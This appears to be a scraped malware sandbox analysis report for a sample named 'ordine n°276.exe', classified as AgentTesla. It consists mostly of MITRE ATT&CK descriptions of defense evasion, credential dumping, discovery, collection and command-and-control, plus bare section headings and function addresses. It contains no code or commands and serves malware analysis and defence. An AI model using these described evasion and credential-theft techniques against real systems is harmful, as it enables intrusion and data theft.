Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ordine n#U00b0 276.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Networking:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Code Manipulations

Function 00404746, Relevance: 47.0, APIs: 1, Strings: 30, Instructions: 529
memoryCOMMON

Function 004037CB, Relevance: 2.4, APIs: 1, Instructions: 1137
COMMON

Function 004038C1, Relevance: 2.4, APIs: 1, Instructions: 1107
COMMON

Function 0040377D, Relevance: 2.3, APIs: 1, Instructions: 1096
COMMON

Function 00403CB3, Relevance: 2.2, APIs: 1, Instructions: 963
COMMON

Function 00403D9F, Relevance: 2.2, APIs: 1, Instructions: 921
COMMON

Function 0040408E, Relevance: 2.1, APIs: 1, Instructions: 898
COMMON

Function 00404263, Relevance: 2.1, APIs: 1, Instructions: 836
memoryCOMMON

Function 00403E98, Relevance: 2.1, APIs: 1, Instructions: 823
COMMON

Function 00403F94, Relevance: 2.1, APIs: 1, Instructions: 803
COMMON

Function 00404551, Relevance: 2.0, APIs: 1, Instructions: 730
memoryCOMMON

Function 00404463, Relevance: 1.9, APIs: 1, Instructions: 674
memoryCOMMON

Function 0040F666, Relevance: 396.5, APIs: 208, Strings: 17, Instructions: 2722
COMMON

Function 0040F8A4, Relevance: 394.5, APIs: 208, Strings: 16, Instructions: 2541
COMMON

Function 00411A00, Relevance: 89.9, APIs: 49, Strings: 2, Instructions: 635
COMMON

Function 00414987, Relevance: 18.1, APIs: 12, Instructions: 123
COMMON

Function 0040157C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre